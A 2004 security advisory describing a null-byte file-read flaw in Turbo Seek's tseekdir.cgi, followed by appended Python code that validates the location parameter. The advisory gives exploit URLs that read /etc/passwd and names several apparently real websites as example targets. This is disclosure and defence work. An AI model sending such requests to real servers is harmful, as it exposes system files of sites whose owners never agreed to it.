File viewing in Search Engine & Directory Powered by Turbo Seek by FocalMedia.Net

2004-09-10T00:00:00
ID SECURITYVULNS:DOC:6776
Type securityvulns
Reporter Securityvulns
Modified 2004-09-10T00:00:00

Description

Hello, 3APA3A.

I found a new vulnerability.

File viewing in Search Engine & Directory Powered by Turbo Seek by FocalMedia.Net

Software / Application - Search Engine & Directory Powered by Turbo Seek
Problem-Type - remote
Vulnerability - ability to read files
Vendor - FocalMedia.Net http://www.focalmedia.net
Risk / Severity - medium
Platforms - *.nix
Details / DESCRIPTION - The tseekdir.cgi script does not check for "null-byte poison".
Exploit -
http://www.xxx.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
http://www.xxx.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00

durito [durito@mail.ru]
LwB Security Team [lwb57.org]
Copyright 2002-2004 by LwB Security Team. All rights reserved.

Examples:
http://www.uscomputer.net/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
http://www.micro2media.com/cgi-bin/turbo/tseekdir.cgi?location=/etc/passwd%00
http://www.clickonbanner.com/cgi-bin/search2/cgi/tseekdir.cgi?id=316&location=/etc/passwd%00
http://www.americanquality.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00

--
Regards,
durito [LwB Security Team]
mailto:durito@mail.ru
http://lwb57.org
http://durito.narod.ru
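The missing check on the `location` parameter described above, as an added example that is not Turbo Seek code and not part of the original advisory. It is written in Python for illustration; `BASE_DIR`, `SUFFIX`, `RejectedLocation` and `resolve_location` are hypothetical names, and the assumption that the script appends a suffix to the parameter before opening the file is not stated on the page.

```python
import os
from urllib.parse import parse_qs

# Assumed directory holding the files the script may serve (hypothetical).
BASE_DIR = "/var/www/turboseek/data"
# Assumed suffix appended to the parameter before opening (hypothetical).
SUFFIX = ".html"


class RejectedLocation(ValueError):
    """Raised when the location parameter must not be used to open a file."""


def resolve_location(query_string, base_dir=BASE_DIR, suffix=SUFFIX):
    """Return the absolute path to serve for ?location=..., or raise RejectedLocation."""
    params = parse_qs(query_string, keep_blank_values=True)
    values = params.get("location", [])
    if len(values) != 1:
        raise RejectedLocation("location must appear exactly once")
    location = values[0]

    # %00 decodes to a NUL byte; a C-level open() stops reading the path
    # there, so the suffix appended below would be silently dropped.
    if "\x00" in location:
        raise RejectedLocation("NUL byte in location")
    # Reject the remaining control characters as well.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in location):
        raise RejectedLocation("control character in location")

    # Treat the value as relative to base_dir even if it starts with "/".
    candidate = os.path.join(base_dir, location.lstrip("/") + suffix)
    # realpath collapses ".." and follows symlinks before the containment check.
    base_real = os.path.realpath(base_dir)
    resolved = os.path.realpath(candidate)
    if os.path.commonpath([base_real, resolved]) != base_real:
        raise RejectedLocation("location escapes the data directory")
    return resolved
```

The NUL check runs on the decoded value, so it also catches a request that carries other parameters such as `id` alongside `location`.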